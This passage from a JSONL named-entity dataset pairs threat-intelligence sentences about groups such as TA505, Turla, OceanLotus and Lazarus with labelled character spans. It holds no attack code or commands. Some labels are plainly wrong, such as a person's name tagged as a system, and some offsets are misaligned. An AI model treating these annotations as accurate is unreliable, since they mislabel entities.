found that Proofpoint reported this malware as AndroMut as well . In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . Another new malware we found that TA505 is using in their campaigns last June 20 against targets in Japan , the Philippines , and Argentina is FlowerPippi . The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation . The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 . The comparison of the infection chains reveals in both cases TA505 used a couple of SFX stages to deploy the RMS\u201d software: a legitimate remote administration tool produced by the Russian company TektonIT . The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the Stealthy email Stealer\u201d part of their arsenal . Also , some code pieces are directly re-used in the analyzed campaigns , such as the i.cmd\u201d and exit.exe\u201d files , and , at the same time , some new components have been introduced , for instance the rtegre.exe\u201d and the veter1605_MAPS_10cr0.exe\u201d file . In 2018 , Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was based on the open-source project Posh-SecMod . Turla is believed to have been operating since at least 2008 , when it successfully breached the US military . This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products . However , it is likely the same scripts are used more globally against many traditional Turla targets in Western Europe and the Middle East . In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface ( AMSI ) .", "spans": [{"start": 117, "end": 125, "label": "Organization"}, {"start": 210, "end": 215, "label": "Organization"}, {"start": 230, "end": 241, "label": "Malware"}, {"start": 244, "end": 272, "label": "Malware"}, {"start": 283, "end": 291, "label": "Malware"}, {"start": 387, "end": 392, "label": "Organization"}, {"start": 496, "end": 502, "label": "System"}, {"start": 545, "end": 547, "label": "Organization"}, {"start": 619, "end": 638, "label": "Malware"}, {"start": 641, "end": 646, "label": "Organization"}, {"start": 652, "end": 671, "label": "Malware"}, {"start": 696, "end": 711, "label": "Malware"}, {"start": 755, "end": 762, "label": "Organization"}, {"start": 863, "end": 869, "label": "System"}, {"start": 893, "end": 906, "label": "Malware"}, {"start": 909, "end": 911, "label": "Organization"}, {"start": 957, "end": 969, "label": "Malware"}, {"start": 980, "end": 1014, "label": "Indicator"}, {"start": 1015, "end": 1019, "label": "Indicator"}, {"start": 1038, "end": 1043, "label": "System"}, {"start": 1129, "end": 1135, "label": "System"}, {"start": 1265, "end": 1270, "label": "System"}, {"start": 1288, "end": 1298, "label": "System"}, {"start": 1312, "end": 1317, "label": "Malware"}, {"start": 1324, "end": 1343, "label": "Malware"}, {"start": 1350, "end": 1356, "label": "Malware"}, {"start": 1425, "end": 1435, "label": "Indicator"}, {"start": 1491, "end": 1497, "label": "System"}, {"start": 1610, "end": 1616, "label": "System"}, {"start": 1670, "end": 1681, "label": "Indicator"}, {"start": 1746, "end": 1751, "label": "Organization"}, {"start": 1856, "end": 1866, "label": "Organization"}, {"start": 1892, "end": 1900, "label": "Organization"}, {"start": 2061, "end": 2066, "label": "Indicator"}, {"start": 2103, "end": 2108, "label": "Organization"}, {"start": 2212, "end": 2223, "label": "Malware"}, {"start": 2240, "end": 2245, "label": "System"}, {"start": 2302, "end": 2306, "label": "Organization"}, {"start": 2416, "end": 2421, "label": "Organization"}, {"start": 2544, "end": 2549, "label": "Organization"}, {"start": 2665, "end": 2687, "label": "Organization"}, {"start": 2771, "end": 2776, "label": "Organization"}, {"start": 2847, "end": 2873, "label": "Malware"}, {"start": 2921, "end": 2926, "label": "Organization"}, {"start": 3026, "end": 3033, "label": "Organization"}, {"start": 3038, "end": 3044, "label": "Organization"}, {"start": 3120, "end": 3125, "label": "System"}, {"start": 3244, "end": 3250, "label": "Indicator"}, {"start": 3255, "end": 3264, "label": "Indicator"}, {"start": 3358, "end": 3369, "label": "Indicator"}, {"start": 3378, "end": 3403, "label": "Indicator"}, {"start": 3421, "end": 3430, "label": "Organization"}, {"start": 3471, "end": 3476, "label": "Organization"}, {"start": 3477, "end": 3494, "label": "Malware"}, {"start": 3551, "end": 3556, "label": "Organization"}, {"start": 3651, "end": 3659, "label": "Organization"}, {"start": 3689, "end": 3694, "label": "Organization"}, {"start": 3704, "end": 3714, "label": "Malware"}, {"start": 3878, "end": 3883, "label": "Organization"}, {"start": 3976, "end": 3981, "label": "Organization"}, {"start": 4008, "end": 4018, "label": "System"}, {"start": 4050, "end": 4076, "label": "System"}, {"start": 4079, "end": 4083, "label": "System"}]}
{"text": "As Unit 42 have observed throughout our tracking of the OilRig group , adopting proven tactics has been a common behavior over time . Based on our research , SWEED \u2014 which has been operating since at least 2017 \u2014 primarily targets their victims with stealers and remote access trojans . It is interesting to note that Turla operators used the free email provider GMX again , as in the Outlook Backdoor and in LightNeuron . This new research confirms our forecast and shows that the Turla group does not hesitate to use open-source pen-testing frameworks to conduct intrusion . Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus aka OilRig , APT34 . Waterbug has been using Meterpreter since at least early 2018 and , in this campaign , used a modified version of Meterpreter , which was encoded and given a .wav extension in order to disguise its true purpose . In all likelihood , Waterbug\u2019s use of Crambus infrastructure appears to have been a hostile takeover . One of the most interesting things to occur during one of Waterbug\u2019s recent campaigns was that during an attack against one target in the Middle East , Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim\u2019s network . These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in addition to targets in the IT and education sectors . Curiously though , Waterbug also compromised other computers on the victim\u2019s network using its own infrastructure . Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug . Aside from the attack involving Crambus infrastructure , this sample of Mimikatz has only been seen used in one other attack , against an education target in the UK in 2017 . The first observed evidence of Waterbug activity came on January 11 , 2018 , when a Waterbug-linked tool (a task scheduler named msfgi.exe ) was dropped on to a computer on the victim\u2019s network . In the case of the attack against the Middle Eastern target , Crambus was the first group to compromise the victim\u2019s network , with the earliest evidence of activity dating to November 2017 . Waterbug\u2019s intrusions on the victim\u2019s network continued for much of 2018 . Symantec did not observe the initial access point and the close timeframe between Waterbug observed activity on the victim\u2019s network and its observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point .", "spans": [{"start": 3, "end": 10, "label": "Organization"}, {"start": 56, "end": 62, "label": "Organization"}, {"start": 158, "end": 163, "label": "Organization"}, {"start": 318, "end": 323, "label": "Organization"}, {"start": 348, "end": 353, "label": "System"}, {"start": 385, "end": 401, "label": "Malware"}, {"start": 409, "end": 420, "label": "Malware"}, {"start": 482, "end": 487, "label": "Organization"}, {"start": 543, "end": 553, "label": "Malware"}, {"start": 577, "end": 583, "label": "Indicator"}, {"start": 600, "end": 609, "label": "Organization"}, {"start": 685, "end": 694, "label": "Organization"}, {"start": 810, "end": 817, "label": "Organization"}, {"start": 822, "end": 828, "label": "Organization"}, {"start": 831, "end": 836, "label": "Organization"}, {"start": 839, "end": 847, "label": "Organization"}, {"start": 863, "end": 874, "label": "Malware"}, {"start": 953, "end": 964, "label": "Malware"}, {"start": 1072, "end": 1082, "label": "Organization"}, {"start": 1090, "end": 1112, "label": "Malware"}, {"start": 1213, "end": 1223, "label": "Organization"}, {"start": 1307, "end": 1315, "label": "Organization"}, {"start": 1462, "end": 1470, "label": "Organization"}, {"start": 1501, "end": 1523, "label": "Organization"}, {"start": 1528, "end": 1555, "label": "Organization"}, {"start": 1603, "end": 1605, "label": "Organization"}, {"start": 1610, "end": 1627, "label": "Organization"}, {"start": 1649, "end": 1657, "label": "Organization"}, {"start": 1729, "end": 1743, "label": "Organization"}, {"start": 1746, "end": 1754, "label": "Organization"}, {"start": 1784, "end": 1792, "label": "Malware"}, {"start": 1826, "end": 1834, "label": "Organization"}, {"start": 1909, "end": 1917, "label": "Malware"}, {"start": 1975, "end": 1984, "label": "Organization"}, {"start": 2043, "end": 2051, "label": "Organization"}, {"start": 2141, "end": 2150, "label": "Indicator"}, {"start": 2270, "end": 2277, "label": "Organization"}, {"start": 2400, "end": 2410, "label": "Organization"}, {"start": 2475, "end": 2483, "label": "Organization"}, {"start": 2557, "end": 2565, "label": "Organization"}, {"start": 2669, "end": 2677, "label": "Organization"}, {"start": 2696, "end": 2718, "label": "Organization"}]}
{"text": "The OceanLotus group was first revealed and named by QiAnXin in May 2015 . It also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool . Waterbug also used an older version of PowerShell , likely to avoid logging . In one of these campaigns , Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest . The malware then uses WebDAV to upload the RAR archive to a Box account .", "spans": [{"start": 4, "end": 14, "label": "Organization"}, {"start": 53, "end": 60, "label": "Organization"}, {"start": 100, "end": 109, "label": "Organization"}, {"start": 168, "end": 179, "label": "Malware"}, {"start": 182, "end": 190, "label": "Organization"}, {"start": 221, "end": 231, "label": "Malware"}, {"start": 288, "end": 296, "label": "Organization"}, {"start": 304, "end": 315, "label": "Malware"}, {"start": 401, "end": 408, "label": "Indicator"}, {"start": 419, "end": 425, "label": "Malware"}, {"start": 440, "end": 451, "label": "Indicator"}]}
{"text": "The OceanLotus , an APT group said to have a Vietnamese background , was first exposed and named by QiAnXin in May 2015 . The DeepSight Managed Adversary and Threat Intelligence team co-authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug ( aka Turla ) Cyber Espionage group , and methods of detecting and thwarting activities of this adversary . The DeepSight MATI team authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug Cyber Espionage group , and methods of detecting and thwarting activities of this adversary . While reviewing a 2015 report\u2075 of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti\u2076 samples designed specifically for Linux\u2077 . Following these reports , Chronicle researchers doubled down on efforts to try to unravel the various campaigns where Winnti was leveraged . Distinct changes to Azazel by the Winnti developers include the addition of a function named \u2018Decrypt2\u2019 , which is used to decode an embedded configuration similar to the core implant . Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . We will see more from Zebrocy into 2019 on government and military related organizations . The PowerShell script will look at the architecture of the system to check which malicious DLL files should be downloaded . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . \bThe FBI issued a rare bulletin admitting that a group named APT6 hacked into US government computer systems as far back as 2011 and for years stole sensitive data . \bFireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123 . \bTrend Micro attributes this activity to MuddyWater , an Iran-nexus actor that has been active since at least May 2017 . \bFireEye assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . FireEye has observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks . On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . Kaspersky reveals that APT33 is a capable group that has carried out Cyber Espionage operations since at least 2013 . APT33 is the only group that Kaspersky has observed use the DROPSHOT dropper . The Cyber Espionage group APT32 heavily obfuscates their backdoors and scripts , and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017 . In all Mandiant investigations to date where the CARBANAK backdoor has been discovered , the activity has been attributed to the FIN7 threat group . Kaspersky released a similar report about the same group under the name Carbanak in February 2015 . FireEye assesses that APT32 leverages a unique suite of fully-featured malware . FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing , consumer products , and hospitality sectors . The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions . FireEye assesses that APT32 is a Cyber Espionage group aligned with Vietnamese government interests . In May and June 2017 , FireEye has associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . APT10 is a Chinese Cyber Espionage group that FireEye has tracked since 2009 . In addition to the spear phishes , FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers . FireEye\u2019s visibility into the operations of APT28 \u2013 a group we believe the Russian government sponsors \u2013 has given us insight into some of the government\u2019s targets , as well as its objectives and the activities designed to further them . FireEye has tracked and profiled APT28 group through multiple investigations , endpoint and network detections , and continuous monitoring . In April 2015 , FireEye uncovered the malicious efforts of APT30 , a suspected China-based threat group . FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the Vendetta Brothers . Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack .", "spans": [{"start": 4, "end": 14, "label": "Organization"}, {"start": 100, "end": 107, "label": "Organization"}, {"start": 126, "end": 153, "label": "Organization"}, {"start": 158, "end": 177, "label": "Organization"}, {"start": 325, "end": 333, "label": "Organization"}, {"start": 340, "end": 345, "label": "Organization"}, {"start": 446, "end": 465, "label": "Organization"}, {"start": 605, "end": 613, "label": "Organization"}, {"start": 744, "end": 750, "label": "Organization"}, {"start": 766, "end": 791, "label": "Organization"}, {"start": 827, "end": 834, "label": "Organization"}, {"start": 904, "end": 913, "label": "Organization"}, {"start": 996, "end": 1002, "label": "Organization"}, {"start": 1039, "end": 1045, "label": "Malware"}, {"start": 1053, "end": 1070, "label": "Organization"}, {"start": 1205, "end": 1212, "label": "Organization"}, {"start": 1337, "end": 1341, "label": "Vulnerability"}, {"start": 1342, "end": 1350, "label": "Vulnerability"}, {"start": 1375, "end": 1382, "label": "Organization"}, {"start": 1396, "end": 1406, "label": "Organization"}, {"start": 1411, "end": 1419, "label": "Organization"}, {"start": 1448, "end": 1465, "label": "Malware"}, {"start": 1525, "end": 1544, "label": "Indicator"}, {"start": 1587, "end": 1594, "label": "Organization"}, {"start": 1628, "end": 1640, "label": "Malware"}, {"start": 1645, "end": 1655, "label": "Malware"}, {"start": 1688, "end": 1691, "label": "Organization"}, {"start": 1744, "end": 1748, "label": "Organization"}, {"start": 1761, "end": 1774, "label": "Organization"}, {"start": 1849, "end": 1864, "label": "Organization"}, {"start": 1892, "end": 1897, "label": "Organization"}, {"start": 1948, "end": 1957, "label": "Organization"}, {"start": 1962, "end": 1970, "label": "Organization"}, {"start": 1973, "end": 1985, "label": "Organization"}, {"start": 2014, "end": 2024, "label": "Organization"}, {"start": 2041, "end": 2046, "label": "Organization"}, {"start": 2094, "end": 2102, "label": "Organization"}, {"start": 2119, "end": 2125, "label": "Organization"}, {"start": 2148, "end": 2153, "label": "System"}, {"start": 2210, "end": 2221, "label": "Organization"}, {"start": 2224, "end": 2231, "label": "Organization"}, {"start": 2296, "end": 2307, "label": "Organization"}, {"start": 2371, "end": 2378, "label": "Organization"}, {"start": 2388, "end": 2393, "label": "Organization"}, {"start": 2403, "end": 2410, "label": "Vulnerability"}, {"start": 2419, "end": 2428, "label": "Organization"}, {"start": 2436, "end": 2449, "label": "Vulnerability"}, {"start": 2462, "end": 2485, "label": "Organization"}, {"start": 2507, "end": 2516, "label": "Organization"}, {"start": 2530, "end": 2535, "label": "Organization"}, {"start": 2625, "end": 2630, "label": "Organization"}, {"start": 2654, "end": 2663, "label": "Organization"}, {"start": 2685, "end": 2701, "label": "Malware"}, {"start": 2730, "end": 2735, "label": "Organization"}, {"start": 2761, "end": 2770, "label": "Malware"}, {"start": 2775, "end": 2782, "label": "Malware"}, {"start": 2819, "end": 2824, "label": "Organization"}, {"start": 2898, "end": 2906, "label": "Organization"}, {"start": 3020, "end": 3024, "label": "Organization"}, {"start": 3040, "end": 3049, "label": "Organization"}, {"start": 3112, "end": 3120, "label": "Organization"}, {"start": 3140, "end": 3147, "label": "Organization"}, {"start": 3221, "end": 3228, "label": "Organization"}, {"start": 3242, "end": 3247, "label": "Organization"}, {"start": 3305, "end": 3328, "label": "Organization"}, {"start": 3331, "end": 3348, "label": "Organization"}, {"start": 3355, "end": 3366, "label": "Organization"}, {"start": 3381, "end": 3388, "label": "Organization"}, {"start": 3389, "end": 3395, "label": "Organization"}, {"start": 3492, "end": 3500, "label": "Organization"}, {"start": 3519, "end": 3524, "label": "Organization"}, {"start": 3538, "end": 3545, "label": "Organization"}, {"start": 3560, "end": 3565, "label": "Organization"}, {"start": 3606, "end": 3616, "label": "Organization"}, {"start": 3617, "end": 3627, "label": "Organization"}, {"start": 3663, "end": 3670, "label": "Organization"}, {"start": 3705, "end": 3710, "label": "Organization"}, {"start": 3804, "end": 3822, "label": "Organization"}, {"start": 3825, "end": 3830, "label": "Organization"}, {"start": 3871, "end": 3878, "label": "Organization"}, {"start": 3939, "end": 3966, "label": "Organization"}, {"start": 3980, "end": 3985, "label": "Organization"}, {"start": 4039, "end": 4048, "label": "Organization"}, {"start": 4083, "end": 4088, "label": "Organization"}, {"start": 4114, "end": 4132, "label": "Organization"}, {"start": 4277, "end": 4284, "label": "Organization"}, {"start": 4310, "end": 4315, "label": "Organization"}, {"start": 4434, "end": 4441, "label": "Organization"}, {"start": 4477, "end": 4482, "label": "Organization"}, {"start": 4524, "end": 4538, "label": "Organization"}, {"start": 4619, "end": 4636, "label": "Organization"}, {"start": 4639, "end": 4645, "label": "Organization"}, {"start": 4650, "end": 4659, "label": "Organization"}, {"start": 4708, "end": 4713, "label": "Organization"}, {"start": 4721, "end": 4726, "label": "System"}, {"start": 4741, "end": 4754, "label": "Vulnerability"}]}
{"text": "The QiAnXin keeps a close eye on activities made by OceanLotus . McAfee concludes that some groups\u2014and especially the Poetry Group \u2014have shifted tactics to use Citadel in ACTs other than what it was originally intended for . McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 . In November 2017 , Talos observed the Group123 , which included a new version of ROKRAT being used in the latest wave of attacks . In addition to TALOS investigation on KONNI , on July 18 2017 , BitDefender released a whitepaper on DarkHotel . According to security 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . ESET has also reported PowerShell scripts being used by Turla to provide direct , in-memory loading and execution of malware . Additionally Kaspersky identified a new backdoor that we attribute with medium confidence to Turla . Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government . Symantec researchers have uncovered evidence that the Waterbug APT group has conducted a hostile takeover of an attack platform . Researchers at the Microstep Intelligence Bureau have published a report on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor . Kaspersky found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager . Trend Micro has previously reported the use of this malware in targeted attacks by the BlackTech group , primarily focused on cyber-espionage in Asia . LuckyMouse activity detected by Palo Alto involved the attackers installing web shells on SharePoint servers to compromise government organizations in the Middle East . Talos published its analysis of the BlackWater campaign , related to MuddyWater group . Trend Micro also reported MuddyWater\u2019s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3 . Regarding other groups , Kaspersky discovered new activity related to ZooPark , a cyber-espionage threat actor that has focused mainly on stealing data from Android devices . Recorded Future published an analysis of the infrastructure built by APT33 ( aka Elfin ) to target Saudi organizations .", "spans": [{"start": 4, "end": 11, "label": "Organization"}, {"start": 52, "end": 62, "label": "Organization"}, {"start": 65, "end": 71, "label": "Organization"}, {"start": 125, "end": 130, "label": "Organization"}, {"start": 225, "end": 231, "label": "Organization"}, {"start": 289, "end": 296, "label": "Organization"}, {"start": 374, "end": 376, "label": "Indicator"}, {"start": 418, "end": 436, "label": "Indicator"}, {"start": 444, "end": 451, "label": "Organization"}, {"start": 499, "end": 504, "label": "Organization"}, {"start": 518, "end": 526, "label": "Organization"}, {"start": 626, "end": 631, "label": "Organization"}, {"start": 649, "end": 654, "label": "Malware"}, {"start": 712, "end": 721, "label": "Organization"}, {"start": 746, "end": 776, "label": "Organization"}, {"start": 825, "end": 839, "label": "Indicator"}, {"start": 842, "end": 846, "label": "Organization"}, {"start": 865, "end": 883, "label": "Malware"}, {"start": 898, "end": 903, "label": "Organization"}, {"start": 982, "end": 991, "label": "Organization"}, {"start": 1009, "end": 1017, "label": "Indicator"}, {"start": 1062, "end": 1067, "label": "Organization"}, {"start": 1085, "end": 1093, "label": "Organization"}, {"start": 1107, "end": 1112, "label": "Organization"}, {"start": 1166, "end": 1176, "label": "Organization"}, {"start": 1179, "end": 1187, "label": "Organization"}, {"start": 1233, "end": 1241, "label": "Organization"}, {"start": 1328, "end": 1357, "label": "Organization"}, {"start": 1409, "end": 1429, "label": "Organization"}, {"start": 1457, "end": 1466, "label": "Organization"}, {"start": 1482, "end": 1491, "label": "Organization"}, {"start": 1548, "end": 1564, "label": "Organization"}, {"start": 1596, "end": 1611, "label": "Malware"}, {"start": 1618, "end": 1621, "label": "Malware"}, {"start": 1662, "end": 1673, "label": "Organization"}, {"start": 1749, "end": 1758, "label": "Organization"}, {"start": 1814, "end": 1824, "label": "Organization"}, {"start": 1846, "end": 1855, "label": "Organization"}, {"start": 1890, "end": 1900, "label": "Malware"}, {"start": 1937, "end": 1961, "label": "Organization"}, {"start": 1983, "end": 1988, "label": "Organization"}, {"start": 2052, "end": 2062, "label": "Organization"}, {"start": 2071, "end": 2082, "label": "Organization"}, {"start": 2097, "end": 2109, "label": "Organization"}, {"start": 2168, "end": 2181, "label": "Indicator"}, {"start": 2200, "end": 2206, "label": "Organization"}, {"start": 2209, "end": 2218, "label": "Organization"}, {"start": 2254, "end": 2261, "label": "Organization"}, {"start": 2341, "end": 2348, "label": "System"}, {"start": 2359, "end": 2374, "label": "Organization"}, {"start": 2428, "end": 2433, "label": "Organization"}, {"start": 2440, "end": 2445, "label": "Organization"}]}
{"text": "Donot , named and tracked by PatchSky , is an attack group that mainly targets countries such as Pakistan in South Asia . Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . In a recent campaign , Kaspersky observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT \u2013 a cloud service-based backdoor . ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . The threat actor behind the campaign , which Kaspersky believes to be the PLATINUM APT group , uses an elaborate , previously unseen , steganographic technique to conceal communication . FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope , Leviathan and TEMP.Jumper . In January , Kaspersky identified new activity by the Transparent Tribe APT group aka PROJECTM and MYTHIC LEOPARD , a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets . OceanLotus was another actor active during this period , using a new downloader called KerrDown , as reported by Palo Alto . ESET recently uncovered a new addition to OceanLotus\u2019s toolset targeting Mac OS . In mid-2018 , Kaspersky's report on Operation AppleJeus\u201d highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges . Kaspersky also observed some activity from Gaza Team and MuddyWater . Kaspersky wrote about LuckyMouse targeting national data centers in June . Kaspersky also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China . Kaspersky have observed similar activity in the past from groups such as Oilrig and Stonedrill , which leads us to believe the new attacks could be connected , though for now that connection is only assessed as low confidence . In August 2019 , FireEye released the Double Dragon\u201d report on our newest graduated threat group , APT41 . Today , FireEye Intelligence is releasing a comprehensive report detailing APT41 , a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations . Group-IB experts continuously monitor the Silence\u2019 activities . Group-IB has uncovered a hacker group , MoneyTaker , attacking banks in the USA and Russia . Group-IB reveals the unknown details of attacks from one of the most notorious APT groups , Lazarus . Finally , Kaspersky produced a summary report on Sofacy\u2019s summertime activity . Kaspersky were also able to produce two reports on Korean speaking actors , specifically involving Scarcruft and Bluenoroff . Analysis of the payload allowed us to confidently link this attack to an actor Kaspersky track as BlackOasis . Kaspersky first became aware of BlackOasis\u2019 activities in May 2016 , while investigating another Adobe Flash zero day .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 29, "end": 37, "label": "Organization"}, {"start": 136, "end": 145, "label": "Organization"}, {"start": 172, "end": 179, "label": "Organization"}, {"start": 199, "end": 212, "label": "Organization"}, {"start": 323, "end": 332, "label": "Organization"}, {"start": 342, "end": 351, "label": "Organization"}, {"start": 453, "end": 459, "label": "Malware"}, {"start": 495, "end": 499, "label": "Organization"}, {"start": 531, "end": 537, "label": "Indicator"}, {"start": 547, "end": 557, "label": "Organization"}, {"start": 614, "end": 619, "label": "Organization"}, {"start": 648, "end": 657, "label": "Organization"}, {"start": 677, "end": 685, "label": "Organization"}, {"start": 790, "end": 797, "label": "Organization"}, {"start": 806, "end": 811, "label": "Organization"}, {"start": 879, "end": 893, "label": "Organization"}, {"start": 896, "end": 905, "label": "Organization"}, {"start": 910, "end": 921, "label": "Organization"}, {"start": 937, "end": 946, "label": "Organization"}, {"start": 1010, "end": 1018, "label": "Organization"}, {"start": 1023, "end": 1037, "label": "Organization"}, {"start": 1136, "end": 1144, "label": "Organization"}, {"start": 1155, "end": 1165, "label": "Organization"}, {"start": 1242, "end": 1250, "label": "Malware"}, {"start": 1268, "end": 1277, "label": "Organization"}, {"start": 1280, "end": 1284, "label": "Organization"}, {"start": 1322, "end": 1334, "label": "Organization"}, {"start": 1376, "end": 1387, "label": "Organization"}, {"start": 1448, "end": 1455, "label": "Organization"}, {"start": 1499, "end": 1508, "label": "Organization"}, {"start": 1556, "end": 1566, "label": "Organization"}, {"start": 1569, "end": 1578, "label": "Organization"}, {"start": 1591, "end": 1601, "label": "Organization"}, {"start": 1644, "end": 1653, "label": "Organization"}, {"start": 1675, "end": 1685, "label": "Organization"}, {"start": 1825, "end": 1834, "label": "Organization"}, {"start": 1898, "end": 1904, "label": "Organization"}, {"start": 1909, "end": 1919, "label": "Organization"}, {"start": 2070, "end": 2077, "label": "Organization"}, {"start": 2152, "end": 2157, "label": "Organization"}, {"start": 2168, "end": 2175, "label": "Organization"}, {"start": 2235, "end": 2240, "label": "Organization"}, {"start": 2350, "end": 2361, "label": "Organization"}, {"start": 2385, "end": 2393, "label": "Organization"}, {"start": 2427, "end": 2435, "label": "Organization"}, {"start": 2449, "end": 2457, "label": "Organization"}, {"start": 2489, "end": 2499, "label": "Organization"}, {"start": 2512, "end": 2517, "label": "Organization"}, {"start": 2542, "end": 2550, "label": "Organization"}, {"start": 2634, "end": 2641, "label": "Organization"}, {"start": 2654, "end": 2663, "label": "Organization"}, {"start": 2693, "end": 2701, "label": "Organization"}, {"start": 2724, "end": 2733, "label": "Organization"}, {"start": 2823, "end": 2832, "label": "Organization"}, {"start": 2837, "end": 2847, "label": "Organization"}, {"start": 2929, "end": 2938, "label": "Organization"}, {"start": 2948, "end": 2958, "label": "Organization"}, {"start": 2961, "end": 2970, "label": "Organization"}, {"start": 2993, "end": 3004, "label": "Organization"}, {"start": 3064, "end": 3069, "label": "System"}, {"start": 3070, "end": 3078, "label": "Vulnerability"}]}
{"text": "After investigation , QiAnXin suspect this attack is carried out by Molerats . It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse.doc ) , along with an executable ( Update.exe ) and DLL ( McUpdate.dll ) .", "spans": [{"start": 22, "end": 29, "label": "Organization"}, {"start": 68, "end": 76, "label": "Organization"}, {"start": 93, "end": 97, "label": "System"}, {"start": 133, "end": 169, "label": "Indicator"}, {"start": 201, "end": 211, "label": "Indicator"}, {"start": 218, "end": 221, "label": "System"}, {"start": 224, "end": 236, "label": "Indicator"}]}
{"text": "In June 2017 , QiAnXin discovered new malware used by Molerats . We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages .", "spans": [{"start": 15, "end": 22, "label": "Organization"}, {"start": 54, "end": 62, "label": "Organization"}, {"start": 79, "end": 90, "label": "Indicator"}]}
{"text": "Last month , QiAnXin captured multiple phishing emails sent by TA505 Group to target financial institutions . Additionally , these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case , Facebook .", "spans": [{"start": 13, "end": 20, "label": "Organization"}, {"start": 63, "end": 68, "label": "Organization"}, {"start": 85, "end": 94, "label": "Organization"}, {"start": 131, "end": 146, "label": "Indicator"}, {"start": 229, "end": 248, "label": "Organization"}, {"start": 277, "end": 285, "label": "Organization"}]}
{"text": "QiAnXin confirmed that this is a DarkHydrus Group\u2019s new attack targeting Middle East region . However , the unique malware variant , BlackEnergy 3 , reemerged in Ukraine early in 2015 , where we had first found Sandworm Team .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 33, "end": 43, "label": "Organization"}, {"start": 133, "end": 146, "label": "Indicator"}, {"start": 211, "end": 224, "label": "Organization"}]}
{"text": "First described by Kaspersky in 2014 and later by Cylance in 2017 , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . The initial indicator of the attack was a malicious Web shell that was detected on an IIS server , coming out of the w3wp.exe process .", "spans": [{"start": 19, "end": 28, "label": "Organization"}, {"start": 50, "end": 57, "label": "Organization"}, {"start": 68, "end": 75, "label": "System"}, {"start": 245, "end": 254, "label": "System"}, {"start": 279, "end": 282, "label": "System"}, {"start": 310, "end": 318, "label": "Indicator"}]}
{"text": "It\u2019s now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware , \u201d said Dennis Schwarz , research analyst on Arbor , in an interview with Threatpost . We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . Instead , sensitive KHNP documents were leaked by the actors as part of an effort to exaggerate the access they had and embarrass the South Korean Government , a technique we assess North Korea would turn to again in order to instill fear and/or meet domestic propaganda aims . North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide .", "spans": [{"start": 129, "end": 136, "label": "System"}, {"start": 146, "end": 160, "label": "System"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 253, "end": 259, "label": "Organization"}, {"start": 308, "end": 318, "label": "Organization"}, {"start": 332, "end": 340, "label": "Organization"}, {"start": 